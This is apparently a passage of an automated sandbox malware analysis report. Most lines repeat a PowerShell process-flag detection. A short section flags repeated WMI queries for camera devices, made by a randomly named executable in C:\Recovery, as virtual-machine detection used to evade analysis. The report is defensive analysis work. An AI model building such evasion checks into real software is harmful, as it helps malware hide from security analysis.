                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
